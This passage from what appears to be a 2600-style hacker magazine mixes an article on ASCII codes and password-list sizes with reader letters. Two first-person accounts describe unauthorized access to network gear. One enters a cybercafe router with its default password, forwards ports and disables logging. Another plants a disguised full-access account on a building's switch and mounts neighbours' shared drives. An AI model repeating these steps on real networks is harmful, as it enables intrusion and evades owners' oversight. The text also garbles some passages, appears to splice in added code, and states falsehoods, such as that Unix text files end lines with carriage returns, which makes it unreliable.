ASCII code. The first 32 codes (0-31), when it comes to text files, are control codes. These codes, which
date back to MS-DOS 1.0, are passed from program to program to perform certain functions. For
example, code 7 is the "bell tone" code. This is the code that causes your computer to send the motherboard the
command to make your onboard PC speaker beep. On a PC compatible system, entering a raw ASCII
command is as simple as holding down the ALT key and entering its code on the numerical keypad (not
the one above the letters).

Here's a simple example:

1) Open a DOS window (C:\COMMAND.COM on most versions of Windows/DOS).

2) At the command prompt, enter "ECHO", and a space.

3) Now, hold down the ALT key, and press 7 on the numerical keypad.

4) Release the ALT key.

5) Your screen should say something similar to "...>ECHO ^G".

6) Now, press the enter key.

Since the DOS command "ECHO" tells your computer to spit back at you what you just entered, it
will display the control character on your screen. But the code you just entered is not a visible character;
it is the bell tone code. Instead of "^G" being proudly displayed, one of two things will happen.
Depending on your system configuration, either your PC speaker will beep (sometimes it will just click on cheap
motherboards), or Windows will play the "default beep" sound file that's programmed in the system
settings. In the latter case, Windows simply intercepts the motherboard's beep command and interprets it
internally.

Other control characters include "backspace", "linefeed" (^J), and "carriage return" (^M). Each of
the ASCII control characters also has a simple keyboard command, such as "break" (3) which is
CTRL+C. Notice how the above bell tone example displayed ^G on the screen? This is because ALT+7
and CTRL+G are the same ASCII command character. This is how functions such as CTRL+C (copy)
and CTRL+V (paste) work in Windows.

Here's a simple example:

7) Open a DOS window (again).

8) At the command prompt, enter "DIR", the DOS command to list the files in the current directory.

9) Now, hold down the ALT key, and press 13 on the numerical keypad.

10) Release the ALT key.

11) Notice that the directory was displayed. This is because ALT+13 is the same as enter.

12) Now, try it again by entering DIR at the prompt again.

13) This time, instead of ALT+13, use CTRL+M.

14) Notice the same thing happens, because CTRL+M is the same as ALT+13.

ASCII codes 32-126 are where the common keys are: A-Z, a-z, 0-9, plus all the symbols keys, space,
and whatnot. 99.9 percent of the time a system password will consist of nothing but these characters.

ASCII codes 127-255 are the "extended" characters. These codes are characters with accent marks, 
drawing characters, and other such novelties. These characters are interpreted differently in DOS and 






Windows environments, and cause a lot of compatibility issues. For this reason, they are mostly not well
understood by the Windows generation. At a DOS window, try ALT+ 176, 177, 178, 219. These are
shading effects used in old school DOS programs. Also, check out the border drawing set, ALT+ (179-222).
If you have ever seen a DOS program that draws a border around itself without any graphical modes, this
is how it does it.

Unix and Linux, because of the nature of the OS itself, can handle passwords made up of almost any
combination of almost any of the 256 characters. Unfortunately, password files simply cannot contain all
of this. The only characters that I know of that can't be used in a Unix/Linux password are codes 0 and 13.
Remember from the above example that 13 is the same as enter. So how would a password be able to
contain an enter as a character? It can't. Code 0 is NULL, and entering nothing is nothing. Linux
passwords can, however, contain the linefeed character. This is where Windows has some trouble. In
Windows, both a linefeed and carriage return are needed to end a line in a text file. But in Unix/Linux, they
both perform a different function.

A linefeed is a control character that says, "Go to the next line." A carriage return is a control
character that says, "Go to the beginning of the line." So in a normal Windows/DOS text file, each line ends
with both a linefeed and a carriage return. Here's an example:

What your computer sees:

Joe is COOL.[CR][LF]He likes Cheese Pizza![CR][LF]DMCA Sucks.

What you see:

Joe is COOL.
He likes Cheese Pizza!
DMCA Sucks.

Your computer displays the first part, "Joe is COOL." It hits the carriage return code and puts the
cursor back to the beginning of the line - at the J in Joe. Then it hits the linefeed character and takes the
cursor down one spot, right below the J in Joe, which is the beginning of the next line. It continues
displaying the next line, "He likes Cheese Pizza!" until it hits the CR and LF again and repeats the
process. This is how each sentence appears to be on its own line, even though a text file is a continuous
string of data.

The problem arises when one of the characters is missing. Let's say for some reason the text file does
not contain the carriage return control characters.

What your computer sees:

Joe is COOL.[LF]He likes Cheese Pizza![LF]DMCA Sucks.

What you see:

Joe is COOL.
            He likes Cheese Pizza!
                                  DMCA Sucks.

This is because the computer displays the first part, "Joe is COOL.", hits the linefeed control
character, and spaces the character down one line where it left off. Since there is no carriage return, the
computer does not reset the cursor at the beginning of the line and it just starts printing where it left off, just
one line down.

Now let's say the same text files now have carriage returns, but are missing the linefeeds.

What the computer sees:

Joe is COOL.[CR]He likes Cheese Pizza![CR]DMCA Sucks.

What you see:

DMCA Sucks.eese Pizza!

This is because the computer prints the first part, "Joe is COOL.", then hits the carriage return control
character and sets the cursor back to the J in Joe. Then it continues with the next line, "He likes Cheese
Pizza!", overwriting what was on the screen before. Since there was no linefeed, the computer did not go
to the next line.
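
The three cases described above (CR and LF together, LF only, CR only) can be reproduced with a small cursor model. This is an added example, not code from the original article; the function names and the sample strings are constructed here for illustration.

```python
from __future__ import annotations

# Constructed samples: the article's three sentences joined with each
# kind of line terminator.
SENTENCES = ["Joe is COOL.", "He likes Cheese Pizza!", "DMCA Sucks."]
CRLF_TEXT = "\r\n".join(SENTENCES)
LF_TEXT = "\n".join(SENTENCES)
CR_TEXT = "\r".join(SENTENCES)


def render(data: str) -> list[str]:
    """Return the screen rows a simple terminal would show for `data`.

    CR only moves the cursor back to column 0 of the current row.
    LF only moves the cursor down one row and keeps the column.
    Any other character is written at the cursor and advances it.
    """
    rows: list[list[str]] = [[]]
    row = col = 0
    for ch in data:
        if ch == "\r":
            col = 0
        elif ch == "\n":
            row += 1
            if row == len(rows):
                rows.append([])
        else:
            line = rows[row]
            # Pad with spaces if the cursor sits beyond the end of the row.
            line.extend(" " * (col - len(line)))
            if col < len(line):
                line[col] = ch          # overwrite what was already there
            else:
                line.append(ch)
            col += 1
    return ["".join(r) for r in rows]


def line_ending_counts(data: bytes) -> dict[str, int]:
    """Count CRLF pairs, bare LFs and bare CRs in a file's raw bytes.

    A file that mixes the three is the kind that displays badly after
    being copied between systems.
    """
    crlf = data.count(b"\r\n")
    return {
        "CRLF": crlf,
        "LF": data.count(b"\n") - crlf,
        "CR": data.count(b"\r") - crlf,
    }


if __name__ == "__main__":
    for label, text in (("CR+LF", CRLF_TEXT), ("LF only", LF_TEXT), ("CR only", CR_TEXT)):
        print(f"--- {label} ---")
        print("\n".join(render(text)))
    print(line_ending_counts(CRLF_TEXT.encode("ascii")))
```
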

The most common place you may experience problems from CR and LF mismatches is during telnet
and terminal sessions. Telnet is not as much of a problem because most servers have adopted the VT100
standard, but using a terminal emulator on a modem has been famous for this kind of trouble. Also CR
and LF play a major role when using a dot-matrix printer. Anyhow, back to the file formatting.

This is why sometimes if you copy a text file from one operating system to another, it doesn't open
right. There are simple ways to fix this, such as opening them in a program that understands the format,
then resaving them. But the fact is that Unix/Linux and Windows/DOS use different text file formats, and
the size of a password file will be larger on a Windows/DOS system than a Unix/Linux system.

Windows/DOS requires a text file to have both the linefeed and carriage return codes, while
Unix/Linux requires only the carriage return (under most configurations).

So, let's get to the math. As discussed earlier, a password can contain any of the characters except the
NULL (code 0) and the carriage return (code 13). So the question is, how big would a text file be that




contains every possible Unix/Linux password? 

Let's figure it out. 

For all practical purposes, we are going to assume the password can be made of any ASCII character
except 0 and 13, and that it can be between zero and eight characters long.

So, of the 256 possible characters, we are going to be using 254 of them. Let's make a chart of the
possibilities.

We know that there's only one zero-character password, a blank one.

Now, for each of the remaining combinations, we are going to use the formula 254 ^ (number of
characters). This will give the possible combinations of 254 characters for any given length of password.


Number of 0 character passwords:                              1
Number of 1 character passwords:                            254
Number of 2 character passwords:                         64,516
Number of 3 character passwords:                     16,387,064
Number of 4 character passwords:                  4,162,314,256
Number of 5 character passwords:              1,057,227,821,024
Number of 6 character passwords:            268,535,866,540,096
Number of 7 character passwords:         68,208,110,101,184,384
Number of 8 character passwords:     17,324,859,965,700,833,536

TOTAL:                               17,393,337,673,075,145,131

Whew! That's a lotta passwords! But how much hard disk space will a plain text list of them all take
up?

Well, let's do more math!

Let's assume the password list will be stored on a Windows/DOS system. This means that every
entry will require a carriage return and linefeed byte to maintain the text file format. So, here's the formula.

Size = (Number of X digit passwords) * (X + 2)

Breakdown: The space needed on the hard drive to store this set of passwords (in bytes) is equal to the
number of password combinations in the set, times the length of each password plus 2 (carriage return
and linefeed).

Example: There are 254 one-character combinations. So that’s 254 passwords times a length of three. 
Each password is three characters long because of the one-character size, plus the carriage return and 
linefeed. 

Okay, let's form another table.

X: # of Passwords * (Digits + 2) = Size in Bytes

0:                          1 * (0 + 2) =                           2
1:                        254 * (1 + 2) =                         762
2:                     64,516 * (2 + 2) =                     258,064
3:                 16,387,064 * (3 + 2) =                  81,935,320
4:              4,162,314,256 * (4 + 2) =              24,973,885,536
5:          1,057,227,821,024 * (5 + 2) =           7,400,594,747,168
6:        268,535,866,540,096 * (6 + 2) =       2,148,286,932,320,768
7:     68,208,110,101,184,384 * (7 + 2) =     613,872,990,910,659,456
8: 17,324,859,965,700,833,536 * (8 + 2) = 173,248,599,657,008,335,360

TOTAL:                                    173,864,628,360,502,142,436

So, how big would a Windows/DOS text file that contained every possible Unix/Linux password be?
Looks like 173,864,628,360,502,142,436 bytes.

That's 169,789,676.2 Terabytes.

Well, this is every possible password ever, but remember I said that 99.9 percent of all passwords only
used characters between ASCII codes 32-126? Let's figure this whole thing out again using this set
instead of the whole shebang.


Number of 0 character passwords:                         1
Number of 1 character passwords:                        95
Number of 2 character passwords:                     9,025
Number of 3 character passwords:                   857,375
Number of 4 character passwords:                81,450,625
Number of 5 character passwords:             7,737,809,375
Number of 6 character passwords:           735,091,890,625
Number of 7 character passwords:        69,833,729,609,375
Number of 8 character passwords:     6,634,204,312,890,625




X: # of Passwords * (Digits + 2) = Size in Bytes

0:                     1 * (0 + 2) =                      2
1:                    95 * (1 + 2) =                    285
2:                 9,025 * (2 + 2) =                 36,100
3:               857,375 * (3 + 2) =              4,286,875
4:            81,450,625 * (4 + 2) =            488,703,750
5:         7,737,809,375 * (5 + 2) =         54,164,665,625
6:       735,091,890,625 * (6 + 2) =      5,880,735,125,000
7:    69,833,729,609,375 * (7 + 2) =    628,503,566,484,375
8: 6,634,204,312,890,625 * (8 + 2) = 66,342,043,128,906,250

TOTAL:                               66,976,482,088,208,262

So, a plain text Windows/DOS format text file containing every possible Unix/Linux password for
ASCII characters 32-126 would be:

66,976,482,088,208,262 bytes which is 65,406.7 Terabytes.

Quite a large file.
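
The two tables above follow from one formula, so they can be recomputed for any alphabet size, length range and line terminator. The following is an added example, not code from the original article; the function names are hypothetical, and the guess rate passed to years_to_enumerate is an assumption chosen only to give a sense of scale.

```python
from __future__ import annotations

SECONDS_PER_YEAR = 365 * 24 * 3600


def keyspace(alphabet_size: int, max_len: int, min_len: int = 0) -> dict[int, int]:
    """Number of distinct passwords for each length in [min_len, max_len]."""
    return {n: alphabet_size ** n for n in range(min_len, max_len + 1)}


def total_passwords(alphabet_size: int, max_len: int, min_len: int = 0) -> int:
    """Sum of the per-length counts (the TOTAL row of the first table)."""
    return sum(keyspace(alphabet_size, max_len, min_len).values())


def wordlist_bytes(alphabet_size: int, max_len: int,
                   terminator_len: int = 2, min_len: int = 0) -> int:
    """Size in bytes of a text file holding every password, one per line.

    terminator_len is 2 for CR+LF (the article's Windows/DOS assumption)
    and 1 for a single-byte line terminator.
    """
    return sum(count * (length + terminator_len)
               for length, count in keyspace(alphabet_size, max_len, min_len).items())


def years_to_enumerate(count: int, guesses_per_second: int) -> float:
    """Years needed to walk through `count` candidates at a fixed rate."""
    return count / guesses_per_second / SECONDS_PER_YEAR


def report(label: str, alphabet_size: int, max_len: int = 8) -> list[str]:
    """Human-readable summary lines for one alphabet."""
    total = total_passwords(alphabet_size, max_len)
    return [
        f"{label}: {alphabet_size} characters, lengths 0-{max_len}",
        f"  passwords:            {total:,}",
        f"  list size (CR+LF):    {wordlist_bytes(alphabet_size, max_len, 2):,} bytes",
        f"  list size (1 byte):   {wordlist_bytes(alphabet_size, max_len, 1):,} bytes",
        # 1,000,000 guesses per second is an assumed rate, not a measurement.
        f"  years at 1e6 guess/s: {years_to_enumerate(total, 1_000_000):,.0f}",
    ]


if __name__ == "__main__":
    for line in report("All codes except 0 and 13", 254):
        print(line)
    for line in report("ASCII codes 32-126", 95):
        print(line)
```

The 1-byte terminator line shows how much of the file is line endings: the difference between the two sizes is exactly one byte per password.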

Perhaps now you can understand why I am forced to laugh when I see a program on a web page or
BBS that claims to be able to generate a complete password list using the entire ASCII alphabet. Sure, the
program probably could do it, if it had two million terabytes to work with. And, oh, it would probably take
a few decades too.

My point being, brute force is a real time-consuming game. It takes raw power that most of us just
don't have available. If you need to brute force, then you'll need to get a program that generates the
password list as it goes, therefore making the requirement for free hard drive space a little less.

While most of you probably knew that a complete password list would be quite a large file, even I was
guilty of thinking a 40-gig hard drive would handle the job. By writing this article I hope to have opened
a few people's eyes and save you the wasted time of trying to accomplish something that is, at best, a bad
idea.

In conclusion, I have a question. What do you and all the computers you come in contact with all have
in common? They both are capable of doing whatever the hell you want. Peace Out.

Greetz: sybah, tekniq, radiate, Mr I \ myke&LM
(Special Thanks to Windows Calculator)

















by gOOgle miner 
gOGgle mi n e r @ f the ri a , com 

I was sitting in a cybercafe recently, daydreaming
how nice it would be to remotely access these
fine Linux boxen in front of me to hop around the
net anonymously. I gave it a shot. No shell access -
someone careful set up these hosts. I tried to
shoulder surf the password out of the bored (but helpful)
cafe worker. My eyes were too slow. D'oh! I tried
to browse / via the browser - no luck. The front
door was impervious. But I asked myself if
someone had set up the "back door" with the same
attention to detail. I surfed to
whatismyipaddress.com and got the IP address. I
made note of it on my PDA. Back in the lab, I
poked around. The IP addy turned out to be a DSL
router doing network address translation (NAT) for
the cafe's machines. This is a pretty common
setup, since it's cheap and secure if it's set up
correctly. Emphasis on the last part of the sentence.

    gOOgle@perciplex:gOOgle(205) telnet 63.228.xxx.xxx
    Trying 63.228.xxx.xxx...
    Connected to 63.228.xxx.xxx.
    Escape character is '^]'.
    Flowpoint/2200 SDSL (ATM) Router fp2200-32 v33. } Ready
    Login:

Lessee, could that be on a default password
list? I surfed to www.phenoelit.de/dpl/dpl.html
(this site is threatened by the DMCA, incidentally)
and saw the default immediately: admin (sad, but
true).

    Login: *****
    Logged in successfully.

Now what? I had to figure out a way to do
some port redirection so that the Flowpoint would
forward specific service traffic to the same port on
internal, NAT'ed hosts. After some Google (ab)usage,
I did:

    # dhcp list

and saw the IP pool of reserved, non-routable
addresses handed out to the cafe clients upon
issuing a DHCP request. I chose one of the IPs and
issued the command which would do the port
forwarding from the Flowpoint to this particular
internal IP address and port. I chose ftp since it
comes enabled on many Linux distros.

    # rem addServer 192.168.254.19 tcp ftp wan
    # exit

Now I tried to connect to the masqueraded
host:

    gOOgle@petriplex:gOOgle(206) ftp 63.228.xxx.xxx
    Connected to some.cybercafe.host.
    220 some.cybercafe.host FTP server ready.
    Name (some.cybercafe.host:gOOgle):

Woohoo! It worked. From here, I could do any
number of things which I will leave to your
imagination. Note that in getting to this point, I did not
change the Flowpoint admin password, muck with
DHCP leases, or generally cause unwarranted
chaos. I also took the time to restore the service to
its previous unforwarded state when I was finished:

    # rem delServer 192.168.254.19 tcp ftp wan

If you try this for yourself, remember not to
choose telnet as the forwarded service, or you will
lose communication with the router on subsequent
connects. It would also be wise to temporarily turn
logging off prior to exploration of the Flowpoint
OS:

    # system log stop

Although this example worked for a cybercafe
setting, you will encounter similar setups
elsewhere since many people 1) trust NAT blindly and
2) are too lazy to change default passwords. It
should be easy to do this for Cisco DSL routers as
well.



by Chris Byrnes
JEAH Communications, LLC
http://www.JEAH.net

A few years back, the government split up the
monopoly Network Solutions held on the
registration market. Now, at that time, they still allowed
Network Solutions to control the global registry
(the thing that all competing registrars report back
to so all the data is kept in sync). As you may
know, Network Solutions is now owned by
VeriSign.

Our good friends at VeriSign not only operate
two registrars (registrars.com, and Network
Solutions), but also this central registry called
"VeriSign Global Registry." Lots of domains have
been expiring in the last few months as people
forget to pay their bills, dot com companies flop, etc.
When these domains expire, they are supposed to
be deleted within a maximum time frame of 30 to
45 days. Otherwise the registrar must pay an
additional registry fee to keep the domain active. (No
registrar will do this if they don't get paid by the
client, of course). This is all according to the
global registry policy.

Let's do a WHOIS lookup on a domain I know
is expired, because I've been trying to register it:
skullbocks.com. skullbocks.com, of course, was
the domain name used in the popular movie
"AntiTrust." This domain is registered at Network
Solutions and it says "Record expires on
05-May-2001." So I contacted VeriSign and asked
why the domain hasn't been deleted yet. No
response.

I spoke with an official at a competing registrar
who told me, "VeriSign essentially is allowed to
break its own rules. It just says that it pays itself
the additional registry fee to keep the domain
alive. In all honesty VeriSign could continue to
hold onto as many expired domains for however
long it wanted, and never be breaking the registry
rules."

ICANN, the non-profit corporation that was
formed to assume responsibility for the IP address
space allocation, protocol parameter assignment,
domain name system management, and root server
system management functions, has yet to adopt a
policy that supersedes the policies put in place by
VeriSign in this matter.





by Javier O.
javih3@yahoo.com

I am writing this article because many admins do
not seem to grasp the importance of security -
especially "inside" security. Last summer I moved into
some new apartments here in beautiful west LA.
About a month later we decided to hook up our place
with DSL, so we placed a call and scheduled an
appointment. Weeks later we had DSL. As soon as the
techs were done with the installation, I busted out my
LinkSYS switch and a couple more hubs and hooked
my whole place up. First thing I did was an IFCONFIG
to get my IP info. I noticed that we were on a
DHCP based service and that we were not the only
ones on the same network segment. I decided to
secure both of my roommates' Windows boxes,
unsharing the drives, setting passwords and permissions for
files and printers. When all that was done I checked
my Linux box. I was curious to see what else was in
our same segment, so I busted out the trusty NMAP
(www.nmap.org) scanner and did a: #>nmap -O
192.168.0/24 > results. That way it would scan the
whole network based on a class C address and the
results from the scan could be saved to the file "results".
As expected, 192.168.1.1 and 192.168.1.2 were
interesting. The first one belonged to a Cisco router and
the second address belonged to a 3Com switch. So I
did a quick telnet to the switch and didn't get a
prompt. So I hit the ENTER key twice and bam! I got
a login prompt. 3Com switches by default have no
password set. According to the manual, you are
supposed to set one upon installation... tsk, tsk. So I typed
in "Admin" with no password and I got the following:

    Menu options: 3Com SuperStack II Switch 1100
    ethernet - Administer Ethernet ports
    ip       - Administer IP
    logout   - Logout of the Command Line Interface
    snmp     - Administer SNMP
    system   - Administer system-level functions

    Type ? for help.

    Select menu option:

I went to the Ethernet menu and checked the
statistics on all the ports. Of course they were all set to
half duplex. So I quickly ran IFCONFIG again on my
computer and got my MAC address. That way I
could check the tables on the switch and find out
what port I was assigned to. I found my MAC
address matched with the MAC address in port 18. My
roommates' MACs also matched port 18. So I went
back to the switch and decided to change our port to
full duplex. I logged in and typed:

    >ethernet <enter>
    >portMode <enter>

Next it asked "what port?" So I typed 18 and then it
asked to enter a value.

    Select Ethernet port (1-26): 18
    Enter new value (10half,10full) [10full]:

I entered "10full" and was sent back to the main
menu. I doublechecked my work and port 18 was at
"10 full". Cool! Next I would create an account for
myself, just in case an act of faith occurs and the
admin decides to check his network and devices. Trying
to make the account not seem suspicious, I named it
"system" and gave full access to it. Before any
changes take place you have to reset the switch, which
can be done remotely. Now by doing some bandwidth
tests, I see some improvement on our connections. It
is not a huge difference since all I did was double the
throughput of the port (full duplex doubles the
throughput of a link), so the bandwidth and other
network traffic was still the same. But at least it helps.
Now the other IP address (192.168.1.1): I was able to
telnet to the Cisco router and get low level access.
Nothing really useful but by running the command:
">show version" I can see that it is a Cisco 2600. The
only way to get root that I know of requires physical
access to the router. Hmm... I guess I can look around
my building next time I take out the trash. There are a
lot of other security issues with this setup, like the
ever famous "file and printer sharing" by Microsoft.
All I had to do was open up "My Network Places" and
choose a workgroup (about five exist on my segment),
then just see what hosts offered what services. It was
really kinda easy to do a "net use x: \\ipaddress\c$" on
my computer and mount some person's drive since
Windows by default shares \c$ and \IPC$. But I was
more interested in the switch and router than snooping
around other people's drives.

As admins and enthusiasts, always secure your
shit from both sides and never trust the users.

Shout outs to: Happvdrgn, AlefZZ* Escorpion. Ihtlesunshyngrl,
my family and to all my other friends.




Continued from page 3 | 

I wrote my own letter.

"Back when I was in high school I read magazines
about computers and software. Then I started building
my own computers from parts salvaged from friends'
old computers plus whatever I had to buy to put
everything together.

"I would also sometimes 'borrow' software which
I could not afford to purchase. While this was illegal, it
is a badly kept secret that this can sometimes greatly
help vendors of the most expensive software to have it
widely available to people interested in learning the
software. They then go to work for companies which
buy hundreds or thousands of copies. In fact, some of
the most expensive creative software is now being
given away free to non-business users for exactly this
reason.

"If I hadn't gotten that experience I wouldn't have
the great job and career I have today. I am now well
paid and therefore have quite a bit of disposable
income which I use for software, new technology, and
entertainment.

"On the entertainment side, there have been dozens
of reports showing that Napster actually increased
album sales. DVD, which most major studios initially
tried to destroy in favor of a horrendous pay-per-watch
format, has been the best thing to happen to that
industry since the VHS machine (which you may recall they
also fought).

"Regardless of what is good for Corporate America,
for once please concentrate on what is good for the
citizenry. There are laws on the books right now which
clearly establish the right of a customer to make a copy
of an item they've purchased for use in another format
(ex. for transfer to a more portable system) or as a
safeguard against damage to the original. These rights
are being violated by members of the MPAA and
especially RIAA every single day, yet nothing is done.

"I ask that you not only prevent the likes of the
SSSCA, but that you look into the continued routine
violations of customers' fair-use and other rights,
unfair business practices, and price fixing by the
companies supporting SSSCA."

— Jeremy M Lang 

If more people took this kind of interest, including
sending letters in the mail, making phone calls, and
even making appointments to talk with elected
officials, it would definitely make a difference. Since this
letter was sent, the SSSCA has been renamed the
CBDTPA (Consumer Broadband and Digital Television
Promotion Act). Keep updated, and spread the word.
It's really our only chance.

Corporate Corruption 

Dear 2600:

I received a rather interesting mailing today from
MCI. The letter, which is attached to a couple of
plastic cards, advertises a new service allowing MCI
subscribers to dial home using a toll-free number
( l -8fK)-4H4-b236) and a four digit code. Each call
costs 35 cents a minute, plus a 26 cent access charge if
the number is dialed from a payphone. Interestingly,
the card is already activated and no password is
needed - just the four digit code on the card. Now, I got
curious about this and dialed the number. When
prompted for a code, I entered something random and
the call began to ring through. Uh oh! This means
anyone can dial into this system and hit random stuff,
incurring charges on unknowing MCI customers' bills.
According to MCI "Your [calling cards] are ready to
use right away. There's no need to sign up for anything
and no extra fee to pay [which, by the way, is not quite
true]." I don't see much potential for abuse here,
unless you drop the card and some random individual
decides to call you up repeatedly out of maliciousness -
or, as in the previous example, if some asshole just
decides to go wacko dialing numbers. Neither of these
things are likely to happen, I suppose, but I would be
willing to bet that every number 0001-9999 rings
through to a different individual's phone line. Misdials
are bound to happen, and one person's mistakes are
conveniently charged directly to another's bill. Not to
mention that the service is a ripoff - the only possible
use I can think of for it is if you are at a payphone with
no change and no access to a cashier or an ATM. Using
a conventional phone card would be more economical
in almost all cases. MCI is essentially charging you
extra to dial your own phone number by way of an
insecure, flawed proxy system that is unnecessary about 99
percent of the time. The ad sheet should have read,
'Make long distance prank phone calls - and charge
them to someone else!' I'd go for that (sarcasm).

~toast66i) 

To put this kind of a "feature" on someone's phone
line without their permission is, at best,
extraordinarily sleazy on MCI's part.

Dear 2600:

In your response to DarkBtayd (18:4), you state
that you don't see how it's possible for Radio Shack to
lose money if someone elects not to activate a piece of
hardware that they've bought (such as DirecTV). One
word: kickbacks. I worked for the Canadian arm way
back when cell phones first came out. Radio Shack, as
well as the competitors, sold cell phones at or below
cost. We got a percentage of the money the airtime
package cost (usually around $300). I was directed to
not sell a phone unless the customer activated it in the
store before he/she left. One of my coworkers "forgot"
and was canned.

vidieOn 

If it's clearly understood that an item is only for
sale if it's activated, that's one thing. It's quite another
if it's simply advertised at a certain price and then all
of your personal info is grabbed at the point of sale as
a "condition" for getting it at that price.

Dear 2600:

I am writing this letter in order to inform you so
you can inform the public. Recently all
Comcast @home (around SGOjOfX)) users were
transitioned to comcast.net. Without warning Comcast cut
the service levels @home users were getting in half.
They have also created connectivity issues with the
poorly executed network and their privacy invading
proxies that aren't even able to be user-disabled. After
all this the price is still rising. I pay the same amount
for less than half the service. Comcast doesn't even
have a news server set up. Also, the upload cap they
have set in place has made it difficult to even
download simple files. I've gone on below to list why this
proxy setup is so bad.

1) Access to IP restricted resources is disrupted. In
order to facilitate access to HTTP IP restricted
resources, I must allow the Comcast proxy server to
access these resources. If I allow the Comcast proxy
server to access these resources, I inadvertently allow
any other users of the proxy server access as well.

2) There is no check and balance on Comcast/ATT
in how they implement the Inktomi Traffic Edge
software or what they do with the information they gather,
or even what information they do gather.

3) Customers were not notified of the change in
service.

4) The Comcast call center was ignorant and
unaware of the change in service.

5) Software which would defeat the intended
purpose of the proxy server (Virtual Private Networks) is
forbidden to be run or implemented by residential
Comcast customers per the Comcast Acceptable Use
Policy and Subscriber Policy.

6) The Traffic Edge software has the ability to
exclude IP addresses from participating in the proxy. I
should be given the opportunity to opt out of this
"service" (I should have been told I was opted in to
something in the first place).

On top of all this you have no other choice if you
want cable Internet access. If Comcast is in your area,
they are your provider. Not to mention that Comcast,
the number three biggest cable provider in the nation,
bought AT&T Broadband, the number one biggest
i io ". nier. Comcast has bought out almost all the little
providers over the years. Now you have Comcast from
Philadelphia to Miami. There is no competition. It's
easy to tell Comcast has no desire to make things
better. The only desire they have is to drive up prices by
giving less and less service and charging more and
more.

Robert Williams 

Dear 2600:

During the Grammys a representative of a record
company spewed for about five minutes on how the
"music food chain" is in danger by people who
download and pirate music. Throughout the entire spiel he
was making false accusations, saying that every kid is
downloading music on the computer behind their
parents' backs, able to download 6,000 songs in three
days. Come on! I live off a shit 56k connection. There
is no way I could even start on that number! He was all
concerned about how the artists will not receive their
money when they make about $2 off every CD while
the rest is sent to record companies. It seems he is
more worried over his money than the "music food
chain." Give me a break!

c(M3wr_kh3r 

It would be interesting to ask this guy if he actually
thought someone would buy that amount of music in a
■ on l store. If that figure is anywhere close to true
(and we don't believe it for a nanosecond), they should
be happy that people are taking an interest in their
product and busy thinking up ways to exploit that
interest. In reality the musicians are being horribly
deceived and taken advantage of by their own record
companies. A recent "settlement" with online music
distributors resulted in money going to the record
companies - and nothing to the artists. We weren't a bit
surprised but a lot of musicians were.

Dear 2600:

It appears Disney is starting young with its
brainwashing (not that I'm surprised). My girlfriend was
flicking through the channels tonight and started to
watch this cartoon on the Disney Channel called "The
Proud Family." It featured this young kid in a black
trenchcoat (a Matrix spoof) enticing his young
girlfriend to download free music from his website. She
complied and then turned into this crazy
music-downloading freak. This eventually led to her arrest and
being banned from the use of her father's computer.
Later she was again enticed by her misguided black
trench coat-wearing friend (who is obviously Disney's
demented impersonation of a hacker) to download
music again. This time, instead of her arrest, she finds at a
local CD store that all of the CDs are gone, leaving
the store owner broke. Her music downloading is to
blame (of course). Not only is he out of business, but
various people are out of jobs who have nothing to do
with the music industry. At the end of the show she
tells this oh so evil hacker kid that downloading music
is stealing and to go away. Of course the show ends
with her getting a great big hug from her mom telling
her she did the right thing.

nomgtion 

Should anyone be surprised at this kind of
propaganda when such corporations practically own the
airwaves in this country? And the only reason we even
say "practically" is because, at least on paper, the
airwaves still belong to the people and can be taken back
if the current holders are deemed unworthy. This
applies to cable outlets as well.

Dear 2600: 

I was reading through an article today and the
headline read "Moviegoing Set Record in 2001."
Apparently the movie industry had the highest grossing
year in 2001 since 1950. Now this strikes me as odd
because there have been so many news articles about
how the MPAA is losing billions of dollars each year
to movie piracy. I went looking for one of these
articles, and found in one a quote I thought was
interesting: "Claiming that the movie industry is losing $3
billion annually through theft of its product in one
form or another, [Jack] Valenti said that what was now
happening could 'disfigure and shred the future of
American films' because of the ease with which films
can now be copied and transported on the Net."

Dash Interrupl 

We're becoming increasingly convinced that
there's a parallel universe MPAA that's adversely
affected by these things. There's really no other
explanation as to how they can make such diametrically
opposed statements and expect them both to be true.
Other than perhaps someone not being completely
honest, that is. Yeah, we'll go with the parallel
universe theory.






Dear 2600:

Yesterday my Business Tech class had a rather
lengthy debate on the issue of open source. We also
discussed the controversial "sharing" of files through
services like Napster, Kazaa, and Morpheus. I've
always liked getting stuff for free through those services,
but I've always sort of been on the fence on that topic.
Until yesterday. We were right in the middle of this big
discussion and I was being uncharacteristically quiet.
Then something deep inside of me woke up. I realized
something. People say that these services are killing
the recording industry. I say let them kill it. Destroy
the establishment. Kill all the record companies and
movie studios. You can't kill art so it will go on
without them. Only instead of having poppy little pieces of
shit like Brittany Spears and Warner Brothers, you'll
have an underground coalition of artists, producing
their work in their basements and sharing it with the
world for little or no money via the Internet. They'll
have day jobs and still continue to produce their art
because they truly believe in and love it. Forget about
money, lose your self image. Indulge your passions,
embrace your art. Free your mind, and take down the
system.

Brad 

Article Feedback 

Dear 2600: 

Your contributor "angelu/aharia" is most
grievously mistaken in the article "Behind the Scenes on a
Web Page" (18:4) when asserting that Akamai
"provides its image delivery services free of charge." I can
assure you that they do not. At least not intentionally.

Akamai is a "content delivery network." They
operate an "edge network" of object cache servers,
placing them in hundreds of NOCs around the world
(though mostly in North America). The long URLs
attached to "akamaized" images, PDFs, streaming media
files, and other web page components are actually
specially assembled URLs that include a cache rule, a
timestamp and/or fingerprint of the content cached,
and a serial number that identifies Akamai's customer
(the web site that owns the component - Wired/Terra
Lycos in the case of the article's web page). Akamai
caches copies of the "heavy" items on a web page on a
network of servers, and then uses its own proprietary
algorithms to identify which of the edge servers are
closest (in a network sense) to the end user and then
delivers the content from that server.

This is meant to improve the response time for
building a complicated web page by limiting the
number of network hops that heavy content needs to
traverse to reach the end user. It is also supposed to lower
the amount of server hardware that a media company
like Terra Lycos has to invest in themselves by limiting
the number of requests that come to the site's origin
servers. The media company pays dearly for this
service - in my experience up to four times the cost of
bandwidth available from the typical bandwidth
provider at a colocation center. Whether the supposed
improvement in web page performance is worth the
exorbitant costs (at least for simple object delivery) is
a matter of no small debate.

As an added bonus, anyone who can figure out the
format of an "ARL" (Akamai Resource Locator) can
piggyback their own content on a paying Akamai
customer's account. Like I said, they don't intentionally
give their bandwidth away for free.

The author implies that Akamai makes its money
by some form of underhanded distribution of end-user
data. That has not been my experience. They have no
problem selling the data back to the web site owner
but they do not cross-sell this information between
firms, as that would be a quick way to get themselves
sued out of existence, not by the end-users, but by the
media companies themselves.

And the author's supposed shock at lycos.com
cookies and URLs sprinkled about a wired.com page
should be no surprise at all. Wired News is simply a
brand owned by Terra Lycos. Of course they are going
to track your activity on their entire family of sites. To
